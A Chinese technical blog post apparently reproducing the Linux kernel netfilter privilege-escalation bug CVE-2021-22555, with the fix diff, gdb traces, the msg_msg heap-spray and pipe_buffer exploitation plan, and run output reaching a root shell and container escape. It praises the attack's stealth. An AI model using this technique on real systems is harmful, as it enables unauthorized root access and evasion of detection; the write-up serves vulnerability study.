内核提权CVE-2021-22555复现分析

2025/04/26 kernel-exploit 共 8638 字,约 25 分钟

CVE-2021-22555 是 netfilter 模块中的一个越界写(OOB,out-of-bounds write)漏洞,到2021年修复时已经存在了15年。问题出现在x64内核通过compat接口加载32位(x86)格式的xt table消息时:两种格式的对齐padding不同,转换过程中对padding的补零操作发生了越界写。漏洞在 v2.6.19-rc1(commit 9fa492cdc160cd27ce1046cb36f47d3b2b1efa21)引入,于2021年4月由 commit b29c457a6511435960115c0f548c4360d5f4801d 修复。

漏洞原理

diff --git a/net/netfilter/x_tables.c b/net/netfilter/x_tables.c
index 6bd31a7a27fc..92e9d4ebc5e8 100644
--- a/net/netfilter/x_tables.c
+++ b/net/netfilter/x_tables.c
@@ -733,7 +733,7 @@ void xt_compat_match_from_user(struct xt_entry_match *m, void **dstptr,
 {
        const struct xt_match *match = m->u.kernel.match;
        struct compat_xt_entry_match *cm = (struct compat_xt_entry_match *)m;
-       int pad, off = xt_compat_match_offset(match);
+       int off = xt_compat_match_offset(match);
        u_int16_t msize = cm->u.user.match_size;
        char name[sizeof(m->u.user.name)];

@@ -743,9 +743,6 @@ void xt_compat_match_from_user(struct xt_entry_match *m, void **dstptr,
                match->compat_from_user(m->data, cm->data);
        else
                memcpy(m->data, cm->data, msize - sizeof(*cm));
-       pad = XT_ALIGN(match->matchsize) - match->matchsize;
-       if (pad > 0)
-               memset(m->data + match->matchsize, 0, pad);

        msize += off;
        m->u.user.match_size = msize;
@@ -1116,7 +1113,7 @@ void xt_compat_target_from_user(struct xt_entry_target *t, void **dstptr,
 {
        const struct xt_target *target = t->u.kernel.target;
        struct compat_xt_entry_target *ct = (struct compat_xt_entry_target *)t;
-       int pad, off = xt_compat_target_offset(target);
+       int off = xt_compat_target_offset(target);
        u_int16_t tsize = ct->u.user.target_size;
        char name[sizeof(t->u.user.name)];

@@ -1126,9 +1123,6 @@ void xt_compat_target_from_user(struct xt_entry_target *t, void **dstptr,
                target->compat_from_user(t->data, ct->data);
        else
                memcpy(t->data, ct->data, tsize - sizeof(*ct));
-       pad = XT_ALIGN(target->targetsize) - target->targetsize;
-       if (pad > 0)
-               memset(t->data + target->targetsize, 0, pad);

        tsize += off;

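漏洞触发路径(完整调用栈见下文 bt 输出):__sys_setsockopt(fd, level, optname, optval, optlen) -> nf_setsockopt -> do_ipt_set_ctl -> compat_do_replace -> translate_compat_table -> compat_copy_entry_from_user -> xt_compat_target_from_user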

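OOB触发后,紧邻的下一页起始的两个字节会被置0(下面两次 x/20a 分别是 memset 执行前后的内存,0xffff888108c9b000 处的指针由 0xffff888108f82000 变为 0xffff888108f80000):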


(gdb) list
1126                    memcpy(t->data, ct->data, tsize - sizeof(*ct));
1127            pad = XT_ALIGN(target->targetsize) - target->targetsize;
1128            if (pad > 0)
1129                    memset(t->data + target->targetsize, 0, pad);
1130
1131            tsize += off;
1132            t->u.user.target_size = tsize;
1133            strlcpy(name, target->name, sizeof(name));
1134            module_put(target->me);
1135            strncpy(t->u.user.name, name, sizeof(t->u.user.name));
(gdb) p t
$104 = (struct xt_entry_target *) 0xffff888108c9afda
(gdb) p t->data
$105 = 0xffff888108c9affa ""
(gdb) x/a t->data
0xffff888108c9affa:     0x0 <fixed_percpu_data>
(gdb) p *t
$106 = {u = {user = {target_size = 32, name = "NFQUEU\240\2264\203\377\377\377\377", '\000' <repeats 14 times>, revision = 1 '\001'}, kernel = {target_size = 32,
      target = 0xffffffff833496a0 <nfqueue_tg_reg+128>}, target_size = 32}, data = 0xffff888108c9affa ""}
(gdb) p/x t
$107 = 0xffff888108c9afda
(gdb) p target->targetsize
$108 = 4
(gdb) p/x 0xffff888108c9affa + 4
$109 = 0xffff888108c9affe

(gdb) x/20a 0xffff888108c9affe + 2
0xffff888108c9b000:     0xffff888108f82000      0xffff8881023f64c0
0xffff888108c9b010:     0x41    0xfd0

(gdb) x/20a 0xffff888108c9affe + 2
0xffff888108c9b000:     0xffff888108f80000      0xffff8881023f64c0
0xffff888108c9b010:     0x41    0xfd0

stack:
(gdb) bt
#0  xt_compat_target_from_user (t=0xffff888108c9afda, dstptr=dstptr@entry=0xffffc90000ae3ac8, size=size@entry=0xffffc90000ae3ac4) at net/netfilter/x_tables.c:1131
#1  0xffffffff81f77bbb in compat_copy_entry_from_user (base=<optimized out>, newinfo=<error reading variable: Cannot access memory at address 0x0>, size=0xffffc90000ae3ac4,
    dstptr=0xffffc90000ae3ac8, e=0xffff888108c99040) at net/ipv4/netfilter/ip_tables.c:1376
#2  translate_compat_table (net=net@entry=0xffff8881053f33c0, pinfo=pinfo@entry=0xffffc90000ae3b80, pentry0=pentry0@entry=0xffffc90000ae3b88, compatr=compatr@entry=0xffffc90000ae3b94)
    at net/ipv4/netfilter/ip_tables.c:1440
#3  0xffffffff81f78974 in compat_do_replace (net=net@entry=0xffff8881053f33c0, arg=..., len=4114) at net/ipv4/netfilter/ip_tables.c:1517
#4  0xffffffff81f78d4d in do_ipt_set_ctl (sk=<optimized out>, cmd=64, arg=..., len=4114) at net/ipv4/netfilter/ip_tables.c:1624
#5  0xffffffff81e1c64a in nf_setsockopt (sk=sk@entry=0xffff888105c31a40, pf=pf@entry=2 '\002', val=val@entry=64, opt=..., len=len@entry=4114) at net/netfilter/nf_sockopt.c:101
#6  0xffffffff81efd387 in ip_setsockopt (sk=0xffff888105c31a40, level=<optimized out>, optname=64, optval=..., optlen=4114) at net/ipv4/ip_sockglue.c:1435
#7  0xffffffff81f0a564 in tcp_setsockopt (sk=0xffff888105c31a40, level=<optimized out>, optname=64, optval=..., optlen=<optimized out>) at net/ipv4/tcp.c:3598
#8  0xffffffff81d17a6a in sock_common_setsockopt (sock=<optimized out>, level=<optimized out>, optname=<optimized out>, optval=..., optlen=<optimized out>) at net/core/sock.c:3249
#9  0xffffffff81d15e64 in __sys_setsockopt (fd=<optimized out>, level=<optimized out>, optname=<optimized out>, user_optval=0xffb44c0a "", optlen=<optimized out>) at net/socket.c:2115
#10 0xffffffff81d98631 in __do_compat_sys_socketcall (args=0xffb44ba8, call=14) at net/compat.c:492
#11 __se_compat_sys_socketcall (args=<optimized out>, call=14) at net/compat.c:424
#12 __ia32_compat_sys_socketcall (regs=<optimized out>) at net/compat.c:424
#13 0xffffffff821710e2 in do_syscall_32_irqs_on (nr=<optimized out>, regs=0xffffc90000ae3f58) at arch/x86/entry/common.c:77
#14 __do_fast_syscall_32 (regs=regs@entry=0xffffc90000ae3f58) at arch/x86/entry/common.c:139
#15 0xffffffff821711f4 in do_fast_syscall_32 (regs=0xffffc90000ae3f58) at arch/x86/entry/common.c:164
#16 0xffffffff8217124f in do_SYSENTER_32 (regs=<optimized out>) at arch/x86/entry/common.c:207
#17 0xffffffff8220164a in entry_SYSENTER_compat () at arch/x86/entry/entry_64_compat.S:139
#18 0x0000000000000000 in ?? ()

利用主要借助message queue:

MSGOP(2)                                                                          System Calls Manual                                                                         MSGOP(2)

NAME
       msgrcv, msgsnd - System V message queue operations

LIBRARY
       Standard C library (libc, -lc)

SYNOPSIS
       #include <sys/msg.h>

       int msgsnd(int msqid, const void msgp[.msgsz], size_t msgsz,
                      int msgflg);

       ssize_t msgrcv(int msqid, void msgp[.msgsz], size_t msgsz, long msgtyp,
                      int msgflg);

DESCRIPTION
       The  msgsnd()  and  msgrcv() system calls are used to send messages to, and receive messages from, a System V message queue.  The calling process must have write permission on
       the message queue in order to send a message, and read permission to receive a message.

       The msgp argument is a pointer to a caller-defined structure of the following general form:

           struct msgbuf {
               long mtype;       /* message type, must be > 0 */
               char mtext[1];    /* message data */
           };

       The mtext field is an array (or other structure) whose size is specified by msgsz, a nonnegative integer value.  Messages of zero length (i.e., no mtext field) are  permitted.
       The mtype field must have a strictly positive integer value.  This value can be used by the receiving process for message selection (see the description of msgrcv() below).

message queue 在内核中的主要结构是 struct msg_msg:

/* offset      |    size */  type = struct msg_msg {
/*      0      |      16 */    struct list_head {
/*      0      |       8 */        struct list_head *next;
/*      8      |       8 */        struct list_head *prev;

                                   /* total size (bytes):   16 */
                               } m_list;
/*     16      |       8 */    long m_type;
/*     24      |       8 */    size_t m_ts;
/*     32      |       8 */    struct msg_msgseg *next;
/*     40      |       8 */    void *security;

                               /* total size (bytes):   48 */
                             }

同一个queue中的message(不论m_type是什么类型)通过m_list串成一个双向链表。从上面的内存布局可以看出,msg_msg的第一个成员(偏移0)是m_list.next指针(注意它不同于偏移32处指向msg_msgseg的next),这也正是越界写入的两个0字节所破坏的位置。

主要的利用思路:

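  • 构造 UAF:堆喷 primary/secondary message 并在 primary message 中制造空洞,利用越界写把某个 primary message 的 m_list.next 低两字节清零,使两个 primary message 指向同一个 secondary message,释放其中一个即可得到 UAF;
  • 之后依次完成 SMAP 绕过(泄露堆地址)、KASLR 绕过(泄露 anon_pipe_buf_ops)和内核代码执行(伪造 pipe_buffer),对应下文运行输出中的 STAGE 1 – STAGE 4。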

kernel config

make defconfig
make kvm_guest.config

在此基础上修改配置:打开 CONFIG_USER_NS=y;另外,KROP中使用了rbp恢复原始的调用栈,因此还需要打开 CONFIG_FRAME_POINTER=y。

msgsnd() -> alloc_msg() 每一片最多分配4K(一页):第一片数据最大为 4K - 0x30(减去 sizeof(struct msg_msg)),后续每一片数据最大为 4K - 8(减去 sizeof(struct msg_msgseg)):

#define DATALEN_MSG	((size_t)PAGE_SIZE-sizeof(struct msg_msg))
#define DATALEN_SEG	((size_t)PAGE_SIZE-sizeof(struct msg_msgseg))

编译:先安装32位编译支持 sudo apt install gcc-multilib,然后执行 gcc -m32 -static -o poc exploit.c(需要编译成32位程序,才能走到内核的compat路径)。

done:

[+] STAGE 0: Initialization
[  100.821096] IPVS: ftp: loaded support on port[0] = 21
[*] Initializing sockets and message queues...
[*] Initialize done sockets and message queues: 3

[+] STAGE 1: Memory corruption
[*] Spraying primary messages...
[*] Spraying secondary messages...
[*] Creating holes in primary messages...
[*] Triggering out-of-bounds write...
[*] Searching for corrupted primary message...
[+] fake_idx: ffa
[+] real_idx: fda

[+] STAGE 2: SMAP bypass
[*] Freeing real secondary message...
[*] Spraying fake secondary messages...
[*] Leaking adjacent secondary message...
[+] primary message kheap_addr: ffff888110091000
[*] Freeing fake secondary messages...
[*] Spraying fake secondary messages...
[*] Leaking primary message...
[+] Got secondary message (current UAF buf) kheap_addr: ffff888109000000

[+] STAGE 3: KASLR bypass
[*] Freeing fake secondary messages...
[*] Spraying fake secondary messages...
[*] Freeing sk_buff data buffer...
[*] Spraying pipe_buffer objects...
[*] Leaking and freeing pipe_buffer object...
[+] anon_pipe_buf_ops: ffffffff829d66c0
[+] kbase_addr: ffffffff81000000
[*] Leaking and freeing pipe_buffer object...

[+] STAGE 4: Kernel code execution
[*] Spraying fake pipe_buffer objects...
[*] Releasing pipe_buffer objects...
[*] Checking for root...
[+] Root privileges gained.

[+] STAGE 5: Post-exploitation
[*] Escaping container...
[*] Cleaning up...
[*] Popping root shell...
root@wintermute:/#

总结

该漏洞从2.6.19开始引入,已经存在了很多年。本次复现采用的技术中,借助RBP恢复了漏洞利用之前的调用栈。

整个利用过程相当于在正常执行流中悄悄执行了几个函数,然后又恢复了正常的流程。

这几个额外调用的函数,完成了权限提升,容器逃逸。

利用过程没有任何新的进程产生,没有任何新的文件产生,也没有文件修改,也没有新连接。

仅仅是切换了权限和进程空间!

利用完美,非常隐蔽。

文档信息

Search

    Table of Contents